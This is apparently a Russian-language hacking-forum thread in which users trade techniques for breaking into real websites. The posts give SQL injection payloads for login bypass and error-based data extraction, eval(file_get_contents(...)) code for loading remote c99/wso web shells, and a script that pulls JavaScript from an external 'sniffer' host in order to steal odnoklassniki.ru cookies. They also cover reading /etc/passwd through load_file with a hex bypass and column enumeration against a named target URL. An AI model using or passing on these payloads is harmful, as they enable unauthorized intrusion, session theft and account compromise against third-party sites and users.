Есть идеи как провести иньекцию если фильтрует все символы кроме \ Executing: select * from user where username='admin\' and password='1'<br>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<script>alert("invalid password");history.back(-1) Если вставить куда нибудь сторонние символы напишет nothing to do here) Есть варианты?
Ну смотри, ты ввёл логин admin\ и пароль 1. Получается: select * from user where username='admin\' and password='1' Выделенное зелёным интерпретируется как строка. Варианты например: зайти без пароля select * from user where username='admin\' and password=' or 1=1 -- ' Error-based эксплуатация: select * from user where username='admin\' and password=' or 1=((select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))))-- ' Про "сторонние символы" не понял.
с инклудом никогда не сталкивался,а с шеллом тем более,на другом сайте у меня есть шелл пробывал я так <?php echo file_get_contents("http://site.ru/c99.txt"); ?> но он не запускается,а просто грузится на страницу и всё если http://site.ru/c99.php то сайт вообщевиснет
там нет инклуда, то обычное выполнения пхп кода, понятное дело что он не запускается, с какого перепугу ему запустится без eval как в моём примере??
можно поподробнее на будущее вот этот код $a = file_get_contents("http://site.ru/wso.txt"); eval($a); где писать?
сделал так <? eval(file_get_contents("http://site.ru/shell.txt"));?> всё нормально запускается,но когда пытаюсь перейти в каталог, чистая страница и Ошибка выполнения программы
я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер <div id="ok_group_widget"></div> <script> !function (d, id, did, st) { var js = d.createElement("script"); js.src = "http://snifer.ejan.ru/connect.js"; js.onload = js.onreadystatechange = function () { if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") { if (!this.executed) { this.executed = true; setTimeout(function () { OK.CONNECT.insertGroupWidget(id,did,st); }, 0); } }} d.documentElement.appendChild(js); }(document,"ok_group_widget","52864984219766","{width:250,height:335}"); </script>
Незнаю что за двиг. В поиске пишу << Получаем http://www.site.com/ru/search/?searchString=<< и ошибку: В первый раз с этим сталкиваюсь. Можно ли что то выжать из этого? Заранее Thanx))
несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
Через ред. шаблонов/тем. Но шаблоны хранятся в файловой системе, поэтому если нет прав на запись,то увы, нигде(если хочешь на всех).
Как Havij проводит load_file? через программку /etc/passwd выводит норм, а вручную вывести что то неполучается
Не знаю, как Havij, но, если у тебя mg=on, то load_file('/etc/passwd'), сам понимаешь, не пройдет. Здесь выручает hex: load_file(0x2f6574632f706173737764)
При обоих вариантах получаю CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION db_name.loаd_file does not exist. до этого что то делал получал пустую страничку. В это же время Havij показывает и показывал все без проблем, вот и интересно, что он делает и как
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
